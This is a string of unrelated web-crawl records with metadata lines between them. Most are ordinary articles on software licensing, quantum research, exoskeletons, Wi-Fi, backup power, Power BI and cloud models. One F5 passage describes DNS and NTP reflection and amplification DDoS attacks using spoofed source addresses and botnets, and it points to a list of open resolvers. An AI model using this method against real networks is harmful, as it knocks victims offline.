Image credit: IBM Systems Mag[/fusion_builder_column][/fusion_builder_row][/fusion_builder_container] | <urn:uuid:eed2e1fc-2c95-42d3-9fde-900fbae470b2> | CC-MAIN-2022-40 | https://irisns.com/2015/06/11/network-architecture-considerations-in-light-of-ipv6/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00119.warc.gz | en | 0.915416 | 1,357 | 2.515625 | 3 |
Open DNS resolvers can be used to recursively query authoritative name servers. In fact, a list of open resolvers can be found at http://openresolverproject.org/. Further, Network Time Protocol (NTP) servers with "monlist" enabled allow a host to query the last 600 connections who have connected to that server. Knowing this, an attacker (possibly using a bot) can send a DNS request using a source address that is spoofed as the IP address of the victim and the open resolver will send all the responses to the victim. See the figure below for a pictoral description of this:
While this is a serious problem, what's worse is that an attacker could use not only one bot to attack the victim but rather an entire army of bots (making up a "botnet") to each individually attack the victim using this same method. The figure below shows this scenario:
The following screen capture shows two requests to the same open DNS resolver. The left is capturing closed packets (not showing payload) while the right shows an expanded response. This shows the large amount of data that a single request can generate. An attacker can use this to overwhelm a victim. | <urn:uuid:c7c3496b-668c-4d8f-b2ae-23980058fa63> | CC-MAIN-2022-40 | https://community.f5.com/t5/technical-articles/abusing-open-resolvers/ta-p/280537 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00319.warc.gz | en | 0.908847 | 246 | 2.5625 | 3 |
According to Wikipedia: “Software asset management (SAM) is a business practice that involves managing and optimizing the purchase, deployment, maintenance, utilization, and disposal of software applications within an organization.” But what does that really mean or look like in a practical sense? Software Asset Management is a vital process in any organization. Understanding how much software you own, which vendors you buy from, terms and conditions of the contracts you’ve signed with these vendors, program limitations, license entitlements and use rights, user needs vs. license installment, and accuracy of inventory are all essential functions of SAM.
For many organizations, SAM is a complex, unwieldy challenge, especially if the organization spans more than one location. Executing an effective SAM program is very difficult for most companies. A good Software Asset Management strategy is key to maintaining compliance and avoiding hefty true-up fees and other noncompliance costs. Companies who are found to be non-compliant with their licensing agreements can face massive fines, sometimes into the millions of dollars, or be subject to legal action.
What Are Software Licenses?
Software licenses are the agreements that allow a company or individual to use proprietary software owned by a vendor. Software License agreements dictate how and where businesses can deploy software, ranging from the operating systems on each computer throughout the organization, to the workplace software used on each machine/device, but may also include database servers and other back-end infrastructure. The licenses also address what sorts of tasks can be performed with the software, how the software is configured, and which features the organization is approved to use.
Staying in Compliance
Companies need to ensure that they purchase an appropriate number of licenses for either the number of devices the software will be installed and used on or; for the number of people who will be using the software. Historically, we’ve seen two main ways that many companies rely on to try to mitigate their risk around compliance with their licensing:(1) choosing to over-license (aka: “better safe than sorry”) practice or; (2) budgeting year-long for eventual true-ups. Being out of compliance can result in the publisher of the software performing a Software Audit, which can result in massive fees for companies found to be missing licenses, plus the added disruption of having your software environment audited.
Over-licensing occurs when an organization purchases more licenses than they need for their environment. While this ensures that the organization will be compliant, the overspending of purchasing more licenses than required is a costly practice, especially when you consider that the licenses won’t be used. A solid SAM strategy will help to ensure that your company does not overpay in the long run by maintaining only the number of licenses necessary.
If a software publisher finds that you are out of compliance, a true-up will be necessary to settle the difference. Depending on the scale of non-compliance, true-ups can cost companies hundreds of thousands or even millions of dollars. Accurate inventory count, proper maintenance, and regular assessment of software asset requirements and use ensures that true-up costs don’t creep up on you too significantly and can help keep auditors at bay.
Part of having a strong Software Asset Management strategy is understanding how to re-negotiate license contracts. At the end of your software license contract term, you will be given the opportunity to re-negotiate with the vendor. When an organization enters into these negotiations with a current view of their software needs and use and a projected view of their future requirements, that information can be leveraged for better pricing and can help avoid unnecessary over-purchasing of new or unneeded licenses.
Staying in compliance may seem like a daunting task, but a strong Software Asset Management strategy can make compliance a much more manageable process. It may seem like the most prudent way to avoid true-up costs or an audit by a vendor would be to purchase more licenses than you need, but this comes with its own costs, especially over the long-term. Unless the organization is in a growth cycle where more employees will be brought on to consume those licenses before the next purchasing cycle, the money spent on over-purchasing licenses is wasted.
A good practice to assist in maintaining compliance should include performing a Self-Assessment at least once a year. An organization is in its best position to make software license decisions when they have a full picture of their software environment.
For more information about Software Asset Management as a whole, or any inquiries about Self-Assessments, we invite you to contact us with your questions. | <urn:uuid:719ad60d-d964-4689-9e0b-4d663d74dc7a> | CC-MAIN-2022-40 | https://metrixdata360.com/sam-series/what-is-software-asset-management/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00319.warc.gz | en | 0.939428 | 969 | 2.53125 | 3 |
Qubits in Hyperchaos a Breakthrough in Quantum Cryptography
(By Becky Bracken) As it stands, there isn’t enough computing power available to study large-scale quantum systems, like those required for quantum cryptography. A group of physicists have just published a paper on what they think is the solution: Hyperchaos Phenomenon.
“As full-scale quantum computing on a true quantum computer is not available yet, the bottleneck is that only small-scale quantum computers, up to dozens of qubits, can be simulated using classical supercomputers,” Dr. Weibin Li, from School of Physics and Astronomy, Nottingham University, who worked on the new research said.
Dr. Li joined with a team assembled from Loughborough and Nottingham and Innopolis universities who report in their article, Emergence and control of complex behaviors in driven systems of interacting quibits with dissipation that qubits excited by a laser eventually enter a state called “hyperchaos” which remained steady as the system was expanded.
Critically, the hyperchaos can be controlled and observed. The ability to control large-scale quantum systems could be a major advance in the race to create new quantum cryptography tools, the report said.
“Here, full control and characterization of quantum computers is the key to performing correct and massive computing,” Dr. Li added. “In the quantum realm, the number of degrees of freedom of a system grows exponentially with its size.”
Fellow author of the report Dr. Alexandre Zogoskin from Loughborough’s School of Science related the Hyperchaos Phenomenon finding to early airplane builders who didn’t have computers available for complex aerodynamics calculations but were still able to observe a smaller set of data to reach the goal of flight.
Orville and Wilbur Wright didn’t hold advanced degrees in engineering, after all.
“In order to design an aircraft, it is necessary to solve certain equations of hydro(aero)dynamics, which are very hard to solve and only became possible way after WWII, when powerful computers appeared,” Dr. Zogoskin said. “Nevertheless, people had been designing and flying aircraft long before that.”
The team is hoping by exciting qubits into hyperchaos the development of large-scale systems won’t be frustrated by a lack of computing power.
“Without this, direct simulation of a quantum system in all detail, using a classical computer, becomes impossible once it contains more than a few thousand qubits,” Dr. Zogoskin explained. “Essentially, there is not enough matter in the Universe to build a classical computer capable of dealing with the problem.”
The next step will be to build, and test scale models created from qubits excited into their hyperchaos state.
Dr. Zogoskin explained the discovery in sheer numbers, “If we can characterize different regimes of a 10,000-qubit quantum computer by just 10,000 such parameters instead of 2^(10000) – which is approximately 2 times a 1 with three thousand zeros – that would be a real breakthrough.” | <urn:uuid:ddc99a68-a51f-49c3-b309-23595667a109> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/qubits-in-hyperchaos-a-breakthrough-in-quantum-cryptography/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00319.warc.gz | en | 0.943711 | 674 | 3.25 | 3 |
July 17, 2018
One cannot begin a blog post talking about workplace safety without sharing some statistics: According to OSHA, there are more than 4,700 worker fatalities in the U.S. each year, and nearly three million work-related injuries and illnesses. U.S. employers spend $95 billion annually on workers’ compensation insurance, and shell out over $20 billion in workers’ comp fees. It’s not just about the money—injuries and illnesses hurt productivity, with employees having to miss work, restrict their activities, or even transfer jobs.
Those three million workers aren’t necessarily doing anything wrong. The work performed on construction sites and in factories is physically demanding. Over time, manual labor takes a toll on the human body, no matter one’s form while doing a task. So, it’s understandable that enterprises would be willing to spend a lot of money to augment human abilities with wearable robotics.
Exoskeletons are mechanical frames worn on the body to alleviate individuals’ physical burdens and enhance their abilities. There are full-body suits as well as partial exoskeletons like bionic arms and motor-assisted gloves. Exoskeletons can be powered (motorized) or not, but the idea is to make it physically easier for workers to do their jobs. (Exoskeleton technology originated in the military defense sector and has proved useful for assisting the physically disabled, paralyzed, and elderly.)
Exoskeletons are an ideal solution for addressing repetitive stress and overexertion injuries, the most common and expensive types of workplace injuries stemming from doing the same motion repeatedly; or from pulling, lifting, pushing, holding or carrying with improper technique or great strain on the job. Exoskeleton technology can make these activities easier by taking pressure off workers’ muscles and nerves, and preventing them from compromising their form. With greater ease comes the ability to work faster and get more done, and of course less risk of injury.
While there are many prototypes and even working exoskeletons currently in production, only a small number of these superhuman suits have been deployed in real industrial work environments. Interest is growing, however, among major enterprises in a range of industries and verticals. The following companies are either developing or testing exoskeleton technology today:
In 2017, the home improvement retailer set up a 3-month trial in one of its Virginia stores, where four employees wore non-motorized exoskeletons to lift objects and stock shelves.
Lowe’s workers can spend up to 90% of their time moving and lifting heavy items like bags of cement and buckets of paint. Looking to make the workday easier for employees, Lowe’s partnered with Virginia Tech to develop a simple exoskeleton. They came up with a harness-like device with carbon fiber rods that act as artificial tendons; bending with the user and storing energy as he goes to pick up an object, and releasing that energy back into the user’s back and legs when he stands up.
Lowe’s also had the employees involved in the trial wear a headset that senses brain activity, revealing whether the wearer enjoyed using the exoskeleton or not. Direct feedback from employees was positive—workers found the tech to be helpful and comfortable enough to wear all day. Lowe’s also believes the technology could be a selling point in recruiting new employees.
The Korean automaker has been building a line of robotic human exoskeletons to supplement or augment the abilities of manual laborers and help paraplegics walk again. One of the exoskeleton models, the Hyundai Universal Medical Assist or HUMA, is designed to aid every limb, supporting up to 88 pounds of a user’s weight. The suit can help fully mobile users lift heavier objects than normal and run at speeds up to 7.5 mph. Another suit, the H-Wex (Hyundai Waist Exoskeleton,) is more of a safety device, designed to reduce the toll of repetitive motions originating from the waist. By giving auto workers, for example, more lifting power or just helping them endure long periods on their feet, the H-Wex can prevent back injuries and fatigue.
Daewoo Shipbuilding and Marine Engineering (DSME)
Exoskeletons can reduce the physical stress of everyday activities by diverting or absorbing the forces that normally affect the body, and they can also endow users with superhuman abilities like the strength to carry loads not normally manageable by a single human being. That is what attracted Daewoo to the technology several years ago: The Korean shipbuilder, maker of some of the world’s largest vessels, showcased its first prototype exoskeleton in 2013.
Made of aluminum alloy, carbon and steel, DSME’s exoskeleton weighs about 60 pounds but is entirely self-supporting, enabling users to lift heavy metal objects up to 66 pounds and still walk at a regular pace. The device is powered, with a three-hour battery life, and supports accessories for specific tasks (like a small attachable crane.) In testing, shipyard workers have generally approved of the technology, which is continually being improved in an effort to achieve a target lifting capacity of 220 pounds.
From full-on robosuits to robotic limbs: In 2016, Airbus revealed a strap-on mechanical arm intended to help assembly line workers execute heavy lifting with ease, even perform superhuman feats like machining parts of a jet hundreds of times a shift.
Airbus’ “third arm” exoskeleton assists workers in its Hamburg plant in using heavy drilling devices—they’re able to drill the 600 holes needed for each wing of an aircraft faster and be more comfortable. The technology cuts down on the costs of building airliners and keeps older workers in employment by increasing their strength.
The multinational corporation believes technologies like exoskeletons, smart glasses and 3D printing will be key in the production of Airbus aircrafts going forward and to achieving the goal of doubling the current output of its A320 aircraft.
The exoskeleton devices mentioned thus far have been prototypes developed in-house, in use by those organizations or not yet for sale. But there are companies that design and sell exoskeletons for industrial use. Ekso Bionics, for instance, has a few enterprise products: The EksoZeroG, a bionic arm that has appeared on construction sites, and the EksoVest, an upper body device for tasks above chest height.
Swiss firm Noonee’s Chairless Chair is popular among automotive companies, including BMW and Audi. In automotive assembly, workers often have to work in unnatural positions (ex. overhead or under a vehicle,) which can lead to serious health issues, as can spending much of the day alternately standing and bending. Noonee’s wearable ergonomic chair allows the wearer to essentially sit in midair and still walk around freely. The device supports Audi factory workers when they bend or lift, helping their body posture, preventing strain and eliminating the fatigue of standing.
As in the aerospace industry, exoskeleton technology can provide better working conditions for an aging automotive workforce.
Lockheed Martin is serious about human augmentation. Though the technology is still in the early adopter phase, Lockheed has an industrial production line: The Fortis exoskeleton is an unpowered, lightweight suit developed for environments like shipyards and heavy construction sites.
The Fortis Tool Arm is available as a separate product, a partial exoskeleton that transfers the weight, vibration and torque of holding industrial power tools from the operator’s body to the ground, making the tools feel weightless. Users, who commonly work overhead or on vertical surfaces, can produce higher quality work with less risk of muscle fatigue and musculoskeletal injury.
There is also the computer-controlled Fortis Knee Stress Release Device (K-SRD,) which reduces the energy soldiers need to cross terrain, kneel for long periods of time, and climb with heavy loads.
With exoskeletons, you get the best of both worlds: The superior strength of a robot combined with a human’s ability to reason, adapt, innovate and improvise. Human workers are not in competition with automation and robotics. The best enterprise IoT ecosystems don’t pit the two against one another but rather use emerging technologies like robotics to assist, relieve, empower and safeguard real workers. | <urn:uuid:23908327-ac27-4934-8621-5837b5a4dd03> | CC-MAIN-2022-40 | https://www.brainxchange.com/blog/practical-fantasy-real-companies-exploring-exoskeletons | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00319.warc.gz | en | 0.939396 | 1,772 | 2.8125 | 3 |
What we think of as "slow internet" can sometimes be a weak WiFi signal. Wireless speeds tend to be less than wired speeds on the same network, due to interference and signal loss over distance. But there are ways you can make sure your WiFi is running as fast as possible.
Optimize your router. See #1 above.
Reduce interference from other electronics. Other devices in your home can slow down your WiFi connection, including microwaves, cordless phones, Bluetooth devices, TVs, wireless security systems, baby monitors, garage door openers, and more. If you have a newer modem, opt for a 5 GHz frequency signal to get a stronger connection and avoid some congestion from surrounding devices, many of which use the 2.4 GHz band. | <urn:uuid:0a156499-97dd-452c-8cb9-4be124e0b4e0> | CC-MAIN-2022-40 | https://www.centurylink.com/home/help/internet/troubleshoot-slow-internet.html?utm_source=Blog&utm_medium=Content&utm_content=what-are-data-caps | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00319.warc.gz | en | 0.943533 | 154 | 2.578125 | 3 |
Facilities that need to have backup power in the case of emergency, like hospitals or telecom service providers, have to stay on top of making sure their backup batteries are ready to go. There are a number of adverse conditions that can cause facilities to need to use emergency power backup, including power outages, surges, blackouts, and more.
If there was a power outage and a facility’s backup batteries are dead, that means the backup power doesn’t kick on. For certain agencies and facilities, that could be a life-and-death situation. For others, that could be a data loss that feels life-or-death.
There are several options for emergency power backups, including lithium-ion uninterruptible power supply systems, standby commercial generators, or lead-acid battery uninterruptible power supply systems.
Most emergency backup power systems are currently built with lead-acid batteries, but there are some definite disadvantages to those, including space requirements, maintenance and battery longevity. Agencies and businesses that rely on uninterruptible power supply systems are increasingly looking for ways to lower their cost while simultaneously lowering their size, weight, and cooling requirements.
Lithium-ion Uninterruptible Power Supply Systems
Lithium-ion UPS have some striking advantages in the battery backup race. In comparison to lead-acid batteries, these batteries often have a higher specific energy/energy density, a longer lifespan, a quicker recharge time, and the ability to carry out more charge/discharge cycles (as many as two or three times more cycles than a lead-acid, depending on the chemical composition of the battery).
Li-ion battery UPS can last three times as long as lead-acid battery UPS.
Lithium batteries take up much less space than traditional lead-acid batteries, meaning a lithium-ion UPS could take up 80 percent less floor space than a conventional model.
There are currently some disadvantages to lithium-ion battery systems. They are more expensive, though as technology advances, prices are falling. They are also more difficult to recycle than other batteries, as most recycling centers don’t currently accept them.
Standby Commercial Generators
Standby commercial generators are one of the main types of generators people think of when they think of emergency power options. Standby commercial generators are built into a facility and use natural gas to power the building in lieu of electricity from the source.
Standby commercial generators have some advantages in the emergency power market. Because they are already built into the facility, there is zero setup time. They kick on as soon as the power shuts off. Because they’re ensconced in the facility and operate using natural gas, they are robust systems that can work in extreme weather.
A standby commercial generator may not be the best option for a business, especially one with a smaller budget or one that needs to be mobile. Standby commercial generators require the installation of natural gas pipes and can’t be moved. Also, because of the nature of the system, it can be more expensive to install than other UPSs.
Lead-acid Battery Uninterruptible Power Supply Systems
Lead-acid batteries are regarded as the conventional and dependable UPS battery solution because they have been used for decades in UPS applications. Because they are so often used, they are also less expensive than other options. Lead-acid batteries are easily recyclable as well.
Lead-acid batteries must be replaced two to three times as often as lithium-ion batteries. They take up much more space than lithium-ion batteries, making them less appealing for mobile applications. They also don’t perform as well as lithium batteries. They take longer to charge as well.
Lithium-ion Uninterruptible Power Supply Systems are a compact, long-lasting, and quicker-charging alternative to other UPS options. Prevent catastrophe with a lithium-ion UPS | <urn:uuid:65ab8a66-ad28-4df3-9f44-bb3faed43f00> | CC-MAIN-2022-40 | https://www.hcienergy.com/blog/emergency-backup-power-options-available-for-commercial-and-remote-applications | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00319.warc.gz | en | 0.956492 | 825 | 3.0625 | 3 |
July 25, 2022
Difference Between Power Pivot, Power Query and Power BI
December 3, 2019
The terms “Power Query,” “Power Pivot,” “Power BI,” and other “Power” more often appear in articles and materials about Microsoft Excel. Not everyone clearly understands what is behind these concepts, how they are interrelated, and how they can help an ordinary Excel user. Let’s clarify the situation.
What is Power Query, Power Pivot, Power BI, and Why do you Need Them?
Power Query is an ETL (Extract, Transform, Load) self-service tool that works like an Excel add-in. It allows users to extract data from different sources, manipulate the specified data into a form that matches their needs, and load it into Excel. Back in 2013, a specially created group of developers inside Microsoft released for Excel a free Power Query add-on (other names are Data Explorer, Get and Transform), which can do a lot of useful things for everyday work:
- Download data to Excel from almost 40 different sources, including databases like SQL, Oracle, Access, Teradata, corporate ERP-systems like SAP, Microsoft Dynamics, Internet services like Facebook, Google Analytics, almost any sites.
- Collect data from files of all basic data types like XLSX, TXT, CSV, JSON, HTML, both singly and in bulk, from all the files in the specified folder. From Excel workbooks, you can automatically download data from all sheets at once.
- Clear the data from the “garbage”: extra columns or rows, repetitions, service information in the “header,” extra spaces or unprintable characters, etc.
- Putting data in order: correct case, number-as-text, fill in the blanks, add the correct table header, disassemble the text sticking to the columns and merge back, divide the data into components, etc.
- Transform tables in every way by bringing them into the desired view (filter, sort, change the order of columns, transpose, add totals, expand cross-tables into flat ones, and rollback).
- Substitute data from one table to another by the coincidence of one or several parameters, i.e., perfectly replaces the VPR function (VLOOKUP) and its analogs.
Power Query is found in two versions: as a separate add-in for Excel, which can be downloaded from the official Microsoft website and as part of Excel 2016. In the first case, a separate tab appears in Excel after installation. In Excel 2016, all the Power Query functionality is already built-in by default and is located on the Data tab as a group of Get and Transform.
The functions, no matter the way you got, there are completely identical. The principal feature of Power Query is that all actions for importing and transforming data are stored in the form of a query – a sequence of steps in the internal Power Query programming language, which is succinctly called “M.” Steps can always be edited and replayed any number of times (update query).
This is the most useful add-on for a wide range of users among all listed in this article. There are a lot of tasks for which previously you had to either terribly pervert with formulas or write macros – now they are easily and beautifully done in Power Query. Moreover, and with the subsequent automatic updating of results. And given the free, in terms of “price-quality” Power Query is simply out of competition and an absolute must-have for any average advanced Excel user these days.
Power Pivot is an in-memory data modeling component that provides highly compressed data storage and extremely fast aggregation and calculation. It is also available as part of Excel and can be used to create a data model in an Excel workbook. Power Pivot can load data by itself or can load data into Power Query. It is very similar to the SSAS (SQL Server Analysis Services) tabular model, which is similar to the server version of Power Pivot.
Power View is an interactive visualization tool that provides users with a drag and drop interface that allows them to quickly and easily create data visualization in their Excel workbooks (using the Power Pivot data model).
Power Pivot is also an add-in for Microsoft Excel but intended a bit for other tasks. If Power Query is focused on importing and processing, then Power Pivot is needed mainly for complex analysis of large amounts of data. In the first approximation, you can think of the Power Pivot as pumped pivot tables.
The general principles for working in Power Pivot are as follows:
- First, you load data into Power Pivot — 15 different sources are supported: common databases (SQL, Oracle, Access …), Excel files, text files, data feeds. Besides, you can use Power Query as a data source, which makes analysis almost omnivorous.
- The links are configured between the loaded tables or, as they say, the Data Model is created. This will allow in the future to build reports on any fields from the existing tables as if it was a single table.
- If necessary, additional calculations are added to the Data Model with the help of calculated columns (an analog of a column with formulas in a smart table) and measures (an analog of a calculated field in summary). All this is written in a special internal Power Pivot language called DAX (Data Analysis eXpressions).
The reports of interest to us in the form of pivot tables and charts are built on the Excel sheet of the Data Model. Power Pivot has several features that make it a unique tool for some tasks:
- In Power Pivot, there is no limit on the number of lines (as in Excel). You can load tables of any size and work with them calmly.
- Power Pivot is very good at compressing data when loading it into the Model. A 50 MB source text file can easily turn into 3-5 MB after downloading.
- Since Power Pivot is “under the hood,” in fact, a full-fledged database engine, it copes with large amounts of information very quickly. Need to analyze 10-15 million records and build a consolidated? And all this on an old laptop? No problem!
Combine Power Query and Power Pivot
Power Query and Power Pivot complement each other. Power Query is the recommended tool for locating, connecting to and importing data. Power Pivot: Powerful data analysis and data modeling tools in Excel are very convenient for modeling the data you imported. You can also use it for data in Excel to view and visualize it using Power Map, Power View, Pivot Tables, and Pivot Charts, and then interact with the resulting workbook in SharePoint, on Power BI sites in Office 365, and in Power BI application Microsoft Store.
This add-on first appeared in 2013 and was originally called GeoFlow. It is intended for visualization of geo-data, i.e., the numerical information on geographical maps. The source data for the display is taken from the same Power Pivot Data Model (see the previous paragraph).
The demo version of Power Map (almost no different from the full capabilities, by the way) can be downloaded completely free again from the Microsoft website. The full version is included in some Microsoft Office 2013-2016 packages with Power Pivot – as a 3D map button on the Insert tab (Insert – 3D-map):
Key features of the Power Map:
- Maps can be both flat and three-dimensional (globe).
- You can use several different types of visualization (histograms, bubble charts, heatmaps, fill areas).
- You can add a time dimension, i.e., animate the process and look at it in development.
Maps are loaded from the Bing Maps service, i.e., To view, you need very smart Internet access. Sometimes there are difficulties with the correct recognition of addresses because names in the data do not always coincide with Bing Maps.
In the full (not demo) version of Power Map, you can use your downloadable maps, for example, to visualize visitors to the shopping center or prices for apartments in a residential building directly on the construction plan.
Based on the created geo-visualizations, you can create videos directly in the Power Map (example), to share them later with those who do not have an add-on installed or include PowerPoint in the presentation.
This add-in appeared for the first time in Excel 2013 and is designed to “revitalize” your data – the construction of interactive graphs, charts, maps, and tables. Sometimes it uses the terms dashboard (dashboard) or scorecard (scorecard). The point is that you can insert a special sheet without cells into your Excel file – a Power View slide, where you can add text, pictures, and a lot of different types of visualizations from your data from the Power Pivot Data Model. Here are the nuances:
- The source data is taken from the same place – from the Power Pivot Data Model.
- To work with Power View, you need to install Silverlight on your computer – a Microsoft’s analog of Flash (free).
- On the Microsoft site, by the way, there is a very decent training course on Power View in Russian.
Power BI, Power Query, and Power Pivot are Related.
Here is a simple diagram explaining how these Powerful tools are related:
Unlike previous ones, Power BI is not an add-in for Excel, but a separate product that represents a whole complex of tools for business analysis and visualization. Power BI is a SaaS service that allows business users to serve their own business intelligence needs. It provides built-in connectivity to SaaS services, such as Salesforce and many others. It provides connections to local and cloud sources using a combination of a direct request and periodic data updates. It is available as a freemium service. It is the successor to Power BI for Office 365, based on Microsoft Office 365 and SharePoint Online, and through Excel 2013 it includes Power Query, Power Pivot, and Power View.
Power BI (with O365 and SharePoint Online) provides a website where users can upload and share their created content with other users can manage gateways to a corporate data source, include data updates and advanced features such as Q and A, which allows natural language query data models. Microsoft also released the standalone Power BI Desktop application, which links Power Query, Power Pivot and Power View in a standalone application, eliminating the limitation of Excel 2013. It is also possible to achieve great Power BI functionality using local SQL Server 2012+, Excel 2010+, and SharePoint 2010+ in place if the cloud is not an option for you.
Power BI Desktop is a program for analyzing and visualizing data, which includes, among other things, all the functionality of Power Query and Power Pivot + add-ons and improved visualization mechanisms from Power View and Power Map. Download and install it for free from the Microsoft website. In Power BI Desktop, you can:
- Download data from more than 70 different sources (as in Power Query + additional connectors).
- Link tables to a model (as in Power Pivot)
- Add additional calculations to data using measures and calculated columns on a DAX (as in Power Pivot)
- To create beautiful interactive reports based on data with different types of visualizations (very similar to Power View, but even better and more Powerful).
- Publish the generated reports on the Power BI Service website (see the next paragraph) and share them with colleagues. And it is possible to give different rights (reading, editing) to different people.
How is Power BI Different from Excel?
So Power Query and Power Pivot in conjunction with Excel can create interactive reports. But there are several crucial differences between Power BI and Excel.
- Power BI allows rich, immersive, and interactive experiences out-of-box. You can click on a bar in a bar chart, and other visuals respond to the event and highlight or filter relevant data. You can show graphs and visuals that are very tricky (or impossible) to reproduce in Excel like maps, pictures, and custom visuals.
- Power BI works with large data sets. There is no artificial limit of 1mn rows in Power BI. You can hook up to a business data set and analyze any volume of data. The limit depends on what your computer (or Power BI server) can process.
- Share and read reports easily. You can create reports in Power BI and share them in formats that are universal (i.e., browser pages or apps). This means your boss need not have Excel or Power BI installed to enjoy the beautiful reports you create.
Power BI is for storytelling, while Excel is for almost anything. You can use Excel to simulate pendulum motion, calculate Venus orbit, model a start-up business plan, or many other things. Power BI is mainly for data analysis and storytelling. If you try to replicate a large, intricate financial model or optimization problem with Power BI, you will either fail or suffer miserably. On the other hand, if you use Power BI for making reports, running cool analysis algorithms (clustering, outlier detection, geospatial patterns, etc.), you will wow your colleagues and bosses.
However, with excellence comes complexity. The more you can do with one tool, the more skill it takes to use it. In case you’re just starting with Power BI, you can easily get help by hiring a consultant to show you and your team the proverbial “ropes.” Power BI training services facilitate a smooth transition of the application to your in-house support teams and give them the skills to keep improving your reporting capabilities.
FluentPro Power BI Consulting Services
Our consultants specialize in Microsoft technologies to help your business reap the full benefits of your data. FluentPro’s Power BI Center of Excellence is a professional team of consultants and developers who will provide you with all the needed assistance to make the most out of your investment into the Microsoft Power BI platform. Our Power BI consulting services include:
- BI strategy and business analysis
- Data architecture and integration
- Data modeling, including DAX programming, Power Query ETL implementation, etc.
- Power BI visualization and reports
Our Power BI consulting team has seen a dramatic increase in demand for our services from businesses that want to hire our expertise to use new analytical tools. In addition to our core technologies, we can put together an integrated solution to meet all your requirements. Our Power BI consulting service is based on 10+ years of experience. We’ll define your BI strategy, architect and implement all the needed infrastructure, and turn your data into comprehensive insights to empower decision making. You should consider FluentPro Power BI consulting services to help you with:
- Adoption and implementation of Microsoft BI technologies
- Customizing the Power BI platform to your maximum benefit
- Integrating any data sources and maintain data infrastructure
- Generate business value through data analytics and visualization
- Get an individual approach to each client, no matter the size or the industry of your enterprise
- Get advanced customization that is tailor-made for your team and its needs
- Help with a personal approach to the key people in the organization who want to get started with Power BI.
- Work with people who are available from anywhere in the world.
- Have necessary training delivered to the key Power BI business users to learn the skills needed to succeed.
Schedule a free consultation
to get help with Power BI today | <urn:uuid:020e2ca1-dd1b-4e95-bc86-6f2cbb88b538> | CC-MAIN-2022-40 | https://fluentpro.com/blog/difference-between-power-pivot-power-query-and-power-bi/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00519.warc.gz | en | 0.909197 | 3,252 | 2.703125 | 3 |
What Are Public Private and Hybrid Cloud?
The organizations have various methods to deploy cloud service resources namely- public private and hybrid cloud. Each of the three has its own set of advantages related to its performances, cost-effectiveness, scalability, cloud security practices, and reliability. It is up to the enterprises to decide which of the three should be deployed based on individual requirements. This blog gives you an insight into what is public private and hybrid cloud and the differences between them in cloud computing technology.
Definition of Public Cloud:
Nowadays, cloud computing is a necessity for businesses. Cloud storage space and servers are now managed by third-party cloud service vendors and supplied over the web. Microsoft Azure, Amazon Web Services, Google Cloud, IBM Cloud are some popular examples of public cloud service providers. It is totally their responsibility to handle the cloud infrastructure like hardware, software, and other supporting systems. The benefit of cloud computing is that enterprises can share their storage, hardware, and network details with other cloud accounts or partners. Online accounts and services can be managed by web browsers. The online email, online storage, online Office applications, and the development and testing environments are serviced by the public clouds.
Advantages of Public Clouds:
- Costing Is Less – With public clouds, the enterprises will just have to pay for the services used in their businesses. There is no necessity to purchase any hardware or software with public cloud deployments.
- Maintenance Cost Is Low – The maintenance of cloud storage infrastructure is done by the cloud service provider. The customers have to just enjoy the services offered by the service providers.
- Unlimited Scalability- The enterprises can avail of unlimited scalability resources for meeting their business requirements at a nominal cost.
- Great Reliability- The service providers have a vast network of servers to address failure issues immediately; thus making the public cloud services reliable.
Definition of Private Cloud:
The private cloud can be hosted in two ways that are:
- The entire storage data center is located in the enterprise itself
- The third-party service provider is given the responsibility to host the storage on behalf of the enterprise
Advantages of Private Clouds:
- Highly Flexible- The enterprise can customize the cloud environment to meet their specific business requirements.
- Much Enhanced Cloud Security- Since the cloud resources are not shared, there are better chances of security control.
- Higher Scalability Features- The private cloud deployment provides better scalability.
Definition of Hybrid Cloud:
A hybrid cloud is a combination of public and private clouds. In this, higher efficiency can be achieved by migrating the data and programs from public to private or private to public; thus achieving higher flexibility with deployment options. Public cloud can be used to store high volume data but with fewer security requirements like web-based email clients. The private cloud can be used to store confidential data and critical operations like customer personal information. In the hybrid cloud, there is an option of cloud bursting. Here, the enterprise resources and software works on the private cloud till there is an absolute necessity or high demand to ‘burst through’ the public cloud. This helps the enterprise to acquire more computing resources on the cloud.
Advantages of Hybrid Clouds:
- Data Control- The enterprises have the benefit of working in the private cloud for sensitive assets.
- Flexibility- The enterprises can opt for the public cloud whenever they need more cloud computing resources.
- Cost-effectiveness- The enterprises have to pay only for the services used in the public cloud; they do not have to pay for the public cloud maintenance charges. There are costs required to maintain a private cloud.
- Ease of Working- Shifting of data from cloud to another takes place in phases and that is a gradual process but not difficult if done properly.
Public private and hybrid cloud are very useful when enterprises understand their cloud computing requirements. The enterprises have to understand the technical concepts of the three and select the best. The security of data in the cloud cannot be compromised even when one among the three is selected. It is best that the enterprises go in for CASB solutions that add an extra layer of security into the confidential data; thus rendering them safe and secure. | <urn:uuid:4d7814c9-4d0a-484e-b020-5f4f68ef1fcb> | CC-MAIN-2022-40 | https://www.cloudcodes.com/blog/differences-public-private-hybrid-cloud.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00519.warc.gz | en | 0.9254 | 862 | 2.546875 | 3 |
With internet access and availability having increased significantly over the past few years, more people now conduct their transactions online. Knowing this, cybercriminals spend considerable amounts of time and money looking for ways to access private personal information or confidential business information for nefarious reasons. Of the many techniques used by cybercriminals to obtain private and confidential information, one of the most endemic is phishing.
